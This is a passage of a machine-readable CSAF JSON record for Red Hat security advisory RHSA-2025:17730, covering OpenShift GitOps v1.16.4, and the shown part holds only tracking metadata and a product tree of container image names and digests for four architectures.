"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_gitops/1.16/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_gitops/1.16/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_17730.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift GitOps v1.16.4 security update",
"tracking": {
"current_release_date": "2025-12-04T17:10:25+00:00",
"generator": {
"date": "2025-12-04T17:10:25+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2025:17730",
"initial_release_date": "2025-10-09T18:47:06+00:00",
"revision_history": [
{
"date": "2025-10-09T18:47:06+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-10-23T03:58:18+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-04T17:10:25+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.16",
"product": {
"name": "Red Hat OpenShift GitOps 1.16",
"product_id": "Red Hat OpenShift GitOps 1.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.16::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3A4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3Ac5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3A190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Ac9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3A0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3A6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Ac2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3A52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256%3A78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3A2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3A3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3A41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Aaf6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3A94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3A645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Ab867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3A814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3Ad1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3A24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3A989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3A89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Abc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3A3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3Aefd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3A8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3A20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3Af505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3Abdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3Af1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3A400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3Ade943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3Af1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3A6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
